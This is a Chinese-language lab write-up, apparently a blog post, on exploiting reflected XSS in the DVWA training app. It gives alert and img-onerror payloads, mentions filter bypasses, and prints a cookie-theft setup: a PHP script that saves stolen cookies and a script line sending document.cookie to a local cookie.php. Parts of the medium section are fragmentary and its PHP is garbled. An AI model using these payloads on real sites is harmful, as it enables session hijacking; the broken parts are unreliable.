dvwa,xss反射型low&&medium

xss,反射型,low&&medium

low

发现xss

本关无过滤

cpp 复制代码
<script>alert(/xss/)</script>
//或
<script>confirm(/xss/)</script>
//或
<script>prompt(/xss/)</script>

出现弹框则存在xss,其中alert()confirm()prompt()为弹框函数

本地搭建

在www目录下放置cookie.php内容如下

cpp 复制代码
<?php
 
$cookie=$_GET['cookie'];//将get请求参数存储到cookie变量中
 
file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。
 
?>

js代码如下

cpp 复制代码
<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>
 
//document.location将页面的内容指定到指定位置。

再在www目录下放置cookie.txt文件用于存放盗取的cookie

实操

目前txt文件什么也没有,我们执行js代码
没有报错解析成功,可以看到url地址栏中有用户的cookie此cookie已经储存进了攻击者的txt文件盗取成功

medium

关对

作为初学者的我第一次接触比较浅的绕过思路

Xss反射型

(一):判断是否存在xss

1:无过滤

使用弹窗函数编写js代码,成功弹框

输入其他标签:(未知领域)

输入<img src=x οnerrοr=alert(/xss/)>,成功弹窗

3:那尝试使用大小写混淆

4:或者双写绕过

<sc

5:还有很多方法自己探究吧相信在以后会掌握更多方法

(二):Js代码如下

(三):盗取cookie

本地www目录下搭建cookie.php

内容如下
<?php cookie=_GET['cookie'];//将get请求参数存储到cookie变量中 file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。 ?>

再创建cookie.txt文档用于存储盗取的cookie

high

尝试别的语言就可以执行

cpp 复制代码
<img src=1 onerror=alert(1)>
相关推荐
05候补工程师15 分钟前
【矩阵代数】伴随矩阵、逆矩阵与秩的逻辑关系全梳理
笔记·线性代数·考研·矩阵
Hua-Jay19 分钟前
OpenCV联合C++/Qt 学习笔记(十八)----二维码检测及积分图像
c++·笔记·qt·opencv·学习
其实防守也摸鱼28 分钟前
upload-labs靶场的pass-2~12的解题步骤及原理讲解
笔记·安全·web安全·网络安全·教程·web·工具
谙弆悕博士34 分钟前
R 语言学习笔记
笔记·学习·数据分析·r语言·数据可视化
西梅汁43 分钟前
VS2019安装漏勾选C#怎么补安装
笔记
William Dawson1 小时前
【 软考中级备考日记|系统集成项目管理工程师Day13:项目风险管理核心精讲\+决策树EMV计算题\+20道专项必刷题(带解析)】
笔记·系统集成项目管理工程师
XS0301061 小时前
Java Web实现简易CRUD操作笔记
java·前端·笔记
许长安1 小时前
RingBuffer:面向网络编程的环形缓冲区实现
服务器·网络·c++·经验分享·笔记·缓存
坐望云起1 小时前
机器学习笔记 - 基于C++的深度学习 四、实现梯度下降
笔记·深度学习·机器学习
码途漫谈1 小时前
把笔记变成可生长的知识系统:Obsidian 技术介绍
笔记·ai·obsidian